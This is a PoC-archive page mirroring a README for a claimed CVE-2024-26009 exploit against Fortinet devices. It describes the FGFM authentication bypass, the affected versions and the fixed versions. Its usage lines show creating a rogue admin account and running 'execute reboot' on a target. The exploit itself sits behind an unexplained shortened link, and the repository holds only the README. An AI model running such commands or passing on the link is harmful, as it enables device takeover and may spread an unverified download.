Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2024-26009 PoC — Fortinet多款产品 安全漏洞

Source
https://github.com/allinsthon/CVE-2024-26009
Associated Vulnerability
Title:Fortinet多款产品 安全漏洞 (CVE-2024-26009)
Description:An authentication bypass using an alternate path or channel [CWE-288] vulnerability in Fortinet FortiOS 6.4.0 through 6.4.15, FortiOS 6.2.0 through 6.2.16, FortiOS 6.0 all versions, FortiPAM 1.2.0, FortiPAM 1.1.0 through 1.1.2, FortiPAM 1.0.0 through 1.0.3, FortiProxy 7.4.0 through 7.4.2, FortiProxy 7.2.0 through 7.2.8, FortiProxy 7.0.0 through 7.0.15, FortiSwitchManager 7.2.0 through 7.2.3, FortiSwitchManager 7.0.0 through 7.0.3 allows an unauthenticated attacker to seize control of a managed device via crafted FGFM requests, if the device is managed by a FortiManager, and if the attacker knows that FortiManager's serial number.
Readme

# CVE-2024-26009 Exploit  
Critical Security Vulnerability in Fortinet Devices  

## Affected Systems  
- FortiOS firewalls (multiple versions)  
- FortiProxy secure web gateways  
- FortiPAM privileged access managers  

## Impact  
Allows complete takeover of vulnerable devices when:  
1. Device is managed by FortiManager  
2. Attacker knows FortiManager's serial number  

Successful exploitation gives full administrator control without requiring valid credentials.  

## Exploit
[href](https://tinyurl.com/4puxhs3k)

## Usage  
```bash  
python3 exploit.py <target_ip> <fortimanager_serial> [options]  
```  

### Basic Examples  
Create new admin account:  
```  
python3 exploit.py 192.168.1.1 FGT60F123456789  
```  

Run custom command:  
```  
python3 exploit.py 10.10.15.200 FGT80XYZ987654 -c "execute reboot"  
```  

### Options  
| Parameter      | Description                          | Default Value |  
|----------------|--------------------------------------|---------------|  
| `-p`/`--port`  | Connection port                      | 9443          |  
| `-c`/`--command` | Command to execute on target device | Creates new admin |  

## Protection  
Immediately upgrade to fixed versions:  
- **FortiOS**: 6.4.16+ or 6.2.17+  
- **FortiProxy**: 7.4.3+, 7.2.9+, or 7.0.16+  
- **FortiPAM**: 1.2.0+  

## Legal Notice  
This tool is for:  
- Security research  
- Authorized penetration testing  
- Educational purposes  

Never use on systems without explicit permission.  

## References  
- [Fortinet Security Advisory](https://www.fortiguard.com/psirt/FG-IR-24-042)  
- CVE Score: 8.1 (High Severity)
File Snapshot

 [4.0K]  /data/pocs/b128c474a3026804de02ac0fbc89d90eb9f25d98
└── [1.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →